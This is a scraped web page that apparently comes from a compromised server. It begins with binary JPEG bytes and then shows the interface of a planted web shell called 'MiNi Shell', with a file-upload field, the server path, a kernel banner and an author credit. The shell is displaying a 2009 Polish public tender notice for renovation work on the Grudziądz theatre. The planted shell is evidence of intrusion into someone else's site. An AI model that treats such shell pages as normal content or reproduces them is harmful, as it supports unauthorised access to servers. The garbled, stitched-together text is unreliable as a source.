JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/52615-N-2009.html

<p class="kh_header"><b>Grudziądz: Roboty remontowe w Centrum Kultury Teatr w Grudziądzu, przy ulicy Focha 19</b><br>
<b>Numer ogłoszenia: 52615 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury Teatr , ul. Focha 19, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4624223, faks 056 4623477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.teatr.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w Centrum Kultury Teatr w Grudziądzu, przy ulicy Focha 19.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, o wartości zamówienia mniejszej niż kwota  określona w przepisach wydanych na podstawie art. 11.8, obejmujące:
Zadanie nr 1 -  wymiana 24 okien na okna drewniane w teatrze
Roboty - wymiana stolarki okiennej w budynku teatru polegać będzie na:
1.Zdemontowaniu skrzydeł i wykuciu z muru ościeżnic okien skrzynkowych w ilości 24 szt.,
2.Uzupełnieniu ościeży okiennych poprzez przymurowanie ścianek gr. 12cm,
3.Dostawie i osadzeniu stolarki okiennej drewnianej nietypowej jednoramowej w kolorze białym.
4.Osadzeniu podokienników zewnętrznych stalowych oraz wewnętrznych drewnianych.
5.Otynkowaniu ościeży wewnętrznych.
6.Wykonaniu gładzi dwuwarstwowej na wykonanych tynkach.
7.Wykonaniu robót malarskich wewnętrznych obrobionych ościeży.
Uwagi dotyczące stolarki okiennej i parapetów:
1.Okna dwurzędowe, dwudzielne.
2.W dolnych skrzydłach okien w środkowej części umieścić szprosy (między szybami).
3.Rodzaj materiału: drewno klejone.
4.Rodzaj wykończenia: malowanie natryskowe fabrycznie.
5.Kolor: biały.
6.Rodzaj okucia: obwiedniowe wg schematu z opcją rozszczelnienia.
7.Wodościeki oraz okapy skrzydeł zewnętrzne w kolorze brązu.
8.Zaczep antywłamaniowy w skrzydłach uchylnych.
9.Szyba jednokomorowa o współczynniku Us = 1,1 W/Km2.
10.Parapety wewnętrzne; drewniane szer. 30 cm, malowane natryskowo.
11.Parapety zewnętrzne : szer. 30cm lakierowane w kolorze białym.
12.W trzech oknach (studio TV) należy dodatkowo zamontować nad górną ościeżnicą okna okapnik
13.W jednym oknie, o powierzchni ok. 1 m2 szyba reflex  (powłoka lustra weneckiego, szkło barwione w masie).
14.Wygląd architektoniczny montowanych okien musi być identyczny jak okna nowo montowane w poprzednich etapach (parter i I. piętro hole boczne i pomieszczenia biurowe parter i I. piętro).
Podane w załączniku wymiary poszczególnych okien nie zwalniają Wykonawcę       z dokonania pomiarów. Przed rozpoczęciem produkcji okien Wykonawca jest zobowiązany bezwzględnie zdjąć wymiary z natury
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa      w art. 67 ust. 1 pkt 6.
Zadanie nr 2 
A- cyklinowanie i lakierowanie parkietu oraz  odnowienie drzwi
Parkiet remontowany  będzie na parterze  wraz ze schodami prowadzącymi na piętro.
Roboty remontowe polegają na :
1.Demontażu listew przypodłogowych typu ćwierćwałek i ponownym montażu wraz  z oszlifowaniem.
2. Ocyklinowaniu ręcznym cokołów  szer 10 cm i oszlifowaniu.
3.Ocyklinowaniu ręcznym elementów schodów.
4. Cyklinowaniu mechanicznym starych powierzchni parkietu.
5.Ułożeniu lakieru parkietowego 3 razy oraz raz zagruntowaniu kaponem.
6. Obustronnym oszlifowaniu i polakierowaniu  drzwi zewnętrznych 
7. Obustronnym  oszlifowaniu i polakierowaniu drzwi wahadłowych z przedsionka na hol i wymianie uchwytów
8. Wymianie 8 uchwytów drzwiowych
9. Należy zastosować lakiery poliuretanowe dopuszczone do stosowania w pomieszczeń użyteczności publicznej.
Przed rozpoczęciem zasadniczych robót Wykonawca wykona, w obecności Inspektora Nadzoru Zamawiającego, prób szlifowania z jednokrotnym lakierowaniem powierzchni  5 m2, która ma na celu sprawdzenie prawidłowości pracy szlifierki do cyklinowania. Wymagana jest akceptacja Zamawiającego.
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6.
B- malowanie ścian i stolarki okiennej w Pracowni plastycznej
CPV 45442100-8 roboty malarskie
Wykonanie robót polegać będzie na:
- ustawienie rusztowań,
- przygotowanie powierzchni ścian i sufitów pod malowanie emulsyjne tj. zeskrobanie i zmycie starej farby z poszpachlowaniem nierówności,
- dwukrotne wymalowanie ścian i sufitów farbą emulsyjną,
- oczyszczenie elementów drewnianych i rur (okna, rury) i omalowaniu olejnym - dwukrotnie,
- zdemontowanie listew i wsporników
Zamawiający zastrzega sobie prawo doboru koloru farby emulsyjnej, przed przystąpieniem do malowania.
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa     w art. 67 ust. 1 pkt 6.
Zadanie nr 3 - wymiana 5 okien na okna drewniane w klubie Akcent
CPV 45422100-2 -  stolarka drewniana
CPV 45421132-8 - instalowanie okien
Roboty - wymiana stolarki okiennej w budynku klubu Akcent polegać będzie na:
1.Zdemontowaniu skrzydeł i wykuciu z muru ościeżnic okien skrzynkowych w ilości 5szt,
2.Uzupełnieniu ościeży okiennych poprzez przymurowanie ścianek gr. 12cm,
3.Dostawie i osadzeniu stolarki okiennej drewnianej nietypowej jednoramowej w kolorze białym.
4.Osadzeniu podokienników zewnętrznych stalowych oraz wewnętrznych drewnianych,
5.Otynkowaniu ościeży wewnętrznych,
6.Wykonaniu gładzi dwuwarstwowej na wykonanych tynkach,
7.Wykonaniu robót malarskich wewnętrznych obrobionych ościeży.
Uwagi dotyczące stolarki okiennej i parapetów:
8.Okna należy wykonać: 2 okna jako dwurzędowe, dwudzielne, prostokątne (rys. 3a), natomiast 3 okna jako jednorzędowe, dwudzielne z nadstawką łukową, uchylną ze szprosami jak w istniejących oknach (rys. 3b).
9.W dolnych skrzydłach okien w środkowej części umieścić szprosy (między szybami),
10.Rodzaj materiału: drewno klejone,
11.Rodzaj wykończenia: malowanie natryskowe fabrycznie,
12.Kolor okien - biały,
13.Rodzaj okucia: obwiedniowe wg schematu z opcją rozszczelnienia,
14.Wodościeki oraz okapy skrzydeł zewnętrzne w kolorze białym,
15.Zaczep antywłamaniowy w skrzydłach uchylnych,
16.Szyba jednokomorowa o współczynniku Us = 1,1 W/Km2,
17.Parapety wewnętrzne; drewniane szer. 30 cm, malowane natryskowo,
18.Parapety zewnętrzne : szer. 30cm lakierowane w kolorze białym.
Podane w załączniku wymiary poszczególnych okien nie zwalniają Wykonawcę       z dokonania pomiarów. Przed rozpoczęciem produkcji okien Wykonawca jest zobowiązany bezwzględnie zdjąć wymiary z natury
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.42.11.32-8, 45.43.21.14-6, 45.45.41.00-5, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki opisane w art. 22 ust. 1 oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych (treść artykułu na załączniku nr 4).
2.Spełnienie warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie możliwe, gdy żaden z nich nie podlega wykluczeniu z udziału w postępowaniu. W szczególności wykluczeniu na podstawie art. 24 ust. 1 pkt 1-10  i ust. 2 pkt od 1 do 3 ustawy Prawo zamówień publicznych.
3.Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. W przypadku wybrania ich oferty Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia , umowy regulującej współpracę tych Wykonawców.
4.Zakres prowadzonej działalności gospodarczej musi obejmować roboty budowlane.
5.Złożona oferta musi być sporządzona na podstawie załączonego przedmiaru robót (lub samodzielnie dokonanych pomiarów), rysunków i specyfikacji technicznej wykonania i odbioru robót oraz zgodna z ustawą Prawo zamówień publicznych i wymaganiami określonymi przez Zamawiającego w niniejszej specyfikacji.
6.Wykonawca musi wykazać się doświadczeniem zawodowym rozumianym jako zrealizowanie lub realizację w ciągu ostatnich 5 lat, przed wszczęciem postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 podobne zadania, za które przyjmuje się roboty budowlane polegające na:
- zadanie nr 1: wymianie w zakresie jednego zamówienia co najmniej 20 okien,
- zadanie nr 2:
-cyklinowanie i lakierowanie w zakresie jednego zadania podłóg                       
  o powierzchni co najmniej 300 m2,
- malowanie ścian i stolarki o wartości nie mniejszej niż wartość w złożonej ofercie,
-zadanie nr 3: wymiana okien o wartości nie mniejszej niż wartość złożonej oferty.
W załączeniu przedstawiając referencje potwierdzające ich należyte wykonanie.
7.Wykonawca wyznacza kierownika budowy, który musi wykazać uprawnienia do kierowania robotami budowlanymi oraz przynależność do Izby Inżynierów Budownictwa.
8.Wykonawca, w czasie realizacji zadania, musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
9.Zamawiający wymaga od Wykonawcy udzielenia 5 letniej gwarancji na wykonane roboty i zastosowane materiały.
10. Wykonawca, w przypadku korzystania z udziału podwykonawców, wskaże w złożonej ofercie części zamówienia, które powierzy podwykonawcom.
Zamawiający oceni spełnienie przez Wykonawców warunków udziału                    w postępowaniu na podstawie złożonych dokumentów. Dokona analizy złożonych dokumentów, przez sprawdzenie ich kompletności, zgodności warunków oraz jakości złożonych dokumentów,  w szczególności dokona analizy w kontekście czy:
- dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
- wystawiony został w okresie ustalonym przez prawo (odpowiednio - nie później,wcześniej niż),
-zawiera informacje wymagane dla tego dokumentu,
-adresatem dokumentu jest Wykonawca uczestniczący w przedmiotowym postępowaniu,
-kserokopia załączona przez Wykonawcę w miejsce oryginału została potwierdzona za zgodność przez osoby uprawnione  lub pełnomocnika (załączono pełnomocnictwo),
-złożony dokument jest kompletny.
Oceny spełnienia warunków dokona Zamawiający metodą spełnia/nie spełnia. Wymagane jest spełnienie wszystkich warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z Wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w niniejszym postępowaniu:
1.Wypełniony formularz ofertowy (na druku załącznika nr 1).
2.Kosztorys ofertowy, a Wykonawca składający ofertę na zadanie nr 1 i/lub zadanie nr 3  dołączy także opis oferowanych okien, potwierdzający spełnienie wymagań Zamawiającego, w szczególności zawartych w pkt II Opis przedmiotu zamówienia oraz certyfikaty na znak bezpieczeństwa, deklaracje zgodności lub certyfikat z Polską Normą lub aprobatę techniczną na oferowane okna (załącznik nr 2).
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej dokument wystawiony w kraju, w którym ma siedzibę lub mieszka potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( załącznik nr 3).
4.Podpisane oświadczenie spełnienia warunków opisanych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (na druku załącznika nr 4).
5.Podpisane oświadczenie o akceptacji warunków opisanych w projekcie umowy (na druku załącznika nr 5).
6.Wykaz zrealizowanych w ciągu ostatnich 5 lat, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej 2 podobnych zadań, za które przyjmuje się roboty opisane w pkt V.6. niniejszej specyfikacji (załącznik nr 6).
7.Referencje potwierdzające, że w/w roboty zostały wykonane z należytą starannością (załącznik nr 7).
8.Nazwisko osoby, która będzie kierowała wykonaniem przedmiotu zamówienia (na druku załącznika nr 8) oraz zaświadczenia o jej uprawnieniach do kierowania robotami budowlanymi i aktualnej przynależności do Izby Inżynierów Budownictwa.
9.Polisę ubezpieczeniową lub inny dokument potwierdzający ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (załącznik nr 9).
10. Pełnomocnictwo do podpisania oferty, o ile nie wynika z innych złożonych dokumentów (załącznik nr 10).
11. Oświadczenia o korzystaniu z udziału podwykonawców ( na druku załącznika nr 11).
Wszystkie złożone dokumenty i oświadczenia muszą być podpisane przez osobę upoważnioną do reprezentowania Wykonawcy. Dokumenty mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.teatr.grudziadz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kultury Teatr, ul. Focha 19, 86-300 Grudziądz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2009 godzina 09:00, miejsce: Sekretariat Centrum Kultury Teatr, ul. Focha 19, 86-300 Grudziądz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Wymiana 24 okien na okna drewniane w teatrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 -  wymiana 24 okien na okna drewniane w teatrze
Roboty - wymiana stolarki okiennej w budynku teatru polegać będzie na:
1.Zdemontowaniu skrzydeł i wykuciu z muru ościeżnic okien skrzynkowych w ilości 24 szt.,
2.Uzupełnieniu ościeży okiennych poprzez przymurowanie ścianek gr. 12cm,
3.Dostawie i osadzeniu stolarki okiennej drewnianej nietypowej jednoramowej w kolorze białym.
4.Osadzeniu podokienników zewnętrznych stalowych oraz wewnętrznych drewnianych.
5.Otynkowaniu ościeży wewnętrznych.
6.Wykonaniu gładzi dwuwarstwowej na wykonanych tynkach.
7.Wykonaniu robót malarskich wewnętrznych obrobionych ościeży.
Uwagi dotyczące stolarki okiennej i parapetów:
1.Okna dwurzędowe, dwudzielne.
2.W dolnych skrzydłach okien w środkowej części umieścić szprosy (między szybami).
3.Rodzaj materiału: drewno klejone.
4.Rodzaj wykończenia: malowanie natryskowe fabrycznie.
5.Kolor: biały.
6.Rodzaj okucia: obwiedniowe wg schematu z opcją rozszczelnienia.
7.Wodościeki oraz okapy skrzydeł zewnętrzne w kolorze brązu.
8.Zaczep antywłamaniowy w skrzydłach uchylnych.
9.Szyba jednokomorowa o współczynniku Us = 1,1 W/Km2.
10.Parapety wewnętrzne; drewniane szer. 30 cm, malowane natryskowo.
11.Parapety zewnętrzne : szer. 30cm lakierowane w kolorze białym.
12.W trzech oknach (studio TV) należy dodatkowo zamontować nad górną ościeżnicą okna okapnik
13.W jednym oknie, o powierzchni ok. 1 m2 szyba reflex  (powłoka lustra weneckiego, szkło barwione w masie).
14.Wygląd architektoniczny montowanych okien musi być identyczny jak okna nowo montowane w poprzednich etapach (parter i I. piętro hole boczne i pomieszczenia biurowe parter i I. piętro).
Podane w załączniku wymiary poszczególnych okien nie zwalniają Wykonawcę       z dokonania pomiarów. Przed rozpoczęciem produkcji okien Wykonawca jest zobowiązany bezwzględnie zdjąć wymiary z natur
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa      w art. 67 ust. 1 pkt 6..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.42.11.32-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2
A-Cyklinowanie i lakierowanie parkietu oraz odnowienie drzwi.
B-Malowanie ścian i stolarki okiennej w Pracowni plastycznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 
A- cyklinowanie i lakierowanie parkietu oraz  odnowienie drzwi
Parkiet remontowany  będzie na parterze  wraz ze schodami prowadzącymi na piętro.
Roboty remontowe polegają na :
1.Demontażu listew przypodłogowych typu ćwierćwałek i ponownym montażu wraz  z oszlifowaniem.
2. Ocyklinowaniu ręcznym cokołów  szer 10 cm i oszlifowaniu.
3.Ocyklinowaniu ręcznym elementów schodów.
4. Cyklinowaniu mechanicznym starych powierzchni parkietu.
5.Ułożeniu lakieru parkietowego 3 razy oraz raz zagruntowaniu kaponem.
6. Obustronnym oszlifowaniu i polakierowaniu  drzwi zewnętrznych 
7. Obustronnym  oszlifowaniu i polakierowaniu drzwi wahadłowych z przedsionka na hol i wymianie uchwytów
8. Wymianie 8 uchwytów drzwiowych
9. Należy zastosować lakiery poliuretanowe dopuszczone do stosowania w pomieszczeń użyteczności publicznej.
Przed rozpoczęciem zasadniczych robót Wykonawca wykona, w obecności Inspektora Nadzoru Zamawiającego, prób szlifowania z jednokrotnym lakierowaniem powierzchni  5 m2, która ma na celu sprawdzenie prawidłowości pracy szlifierki do cyklinowania. Wymagana jest akceptacja Zamawiającego.
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6.

B- malowanie ścian i stolarki okiennej w Pracowni plastycznej
Wykonanie robót polegać będzie na:
- ustawienie rusztowań,
- przygotowanie powierzchni ścian i sufitów pod malowanie emulsyjne tj. zeskrobanie i zmycie starej farby z poszpachlowaniem nierówności,
- dwukrotne wymalowanie ścian i sufitów farbą emulsyjną,
- oczyszczenie elementów drewnianych i rur (okna, rury) i omalowaniu olejnym - dwukrotnie,
- zdemontowanie listew i wsporników
Zamawiający zastrzega sobie prawo doboru koloru farby emulsyjnej, przed przystąpieniem do malowania.
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa     w art. 67 ust. 1 pkt 6..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.14-6, 45.45.41.00-5, 45.44.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Wymiana 5 okien na okna drewniane w klubie Akcent.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - wymiana 5 okien na okna drewniane w klubie Akcent
CPV 45422100-2 -  stolarka drewniana
CPV 45421132-8 - instalowanie okien
Roboty - wymiana stolarki okiennej w budynku klubu Akcent polegać będzie na:
1.Zdemontowaniu skrzydeł i wykuciu z muru ościeżnic okien skrzynkowych w ilości 5szt,
2.Uzupełnieniu ościeży okiennych poprzez przymurowanie ścianek gr. 12cm,
3.Dostawie i osadzeniu stolarki okiennej drewnianej nietypowej jednoramowej w kolorze białym.
4.Osadzeniu podokienników zewnętrznych stalowych oraz wewnętrznych drewnianych,
5.Otynkowaniu ościeży wewnętrznych,
6.Wykonaniu gładzi dwuwarstwowej na wykonanych tynkach,
7.Wykonaniu robót malarskich wewnętrznych obrobionych ościeży.
Uwagi dotyczące stolarki okiennej i parapetów:
8.Okna należy wykonać: 2 okna jako dwurzędowe, dwudzielne, prostokątne (rys. 3a), natomiast 3 okna jako jednorzędowe, dwudzielne z nadstawką łukową, uchylną ze szprosami jak w istniejących oknach (rys. 3b).
9.W dolnych skrzydłach okien w środkowej części umieścić szprosy (między szybami),
10.Rodzaj materiału: drewno klejone,
11.Rodzaj wykończenia: malowanie natryskowe fabrycznie,
12.Kolor okien - biały,
13.Rodzaj okucia: obwiedniowe wg schematu z opcją rozszczelnienia,
14.Wodościeki oraz okapy skrzydeł zewnętrzne w kolorze białym,
15.Zaczep antywłamaniowy w skrzydłach uchylnych,
16.Szyba jednokomorowa o współczynniku Us = 1,1 W/Km2,
17.Parapety wewnętrzne; drewniane szer. 30 cm, malowane natryskowo,
18.Parapety zewnętrzne : szer. 30cm lakierowane w kolorze białym.
Podane w załączniku wymiary poszczególnych okien nie zwalniają Wykonawcę       z dokonania pomiarów. Przed rozpoczęciem produkcji okien Wykonawca jest zobowiązany bezwzględnie zdjąć wymiary z natury
Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.00-2, 45.42.11.32-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com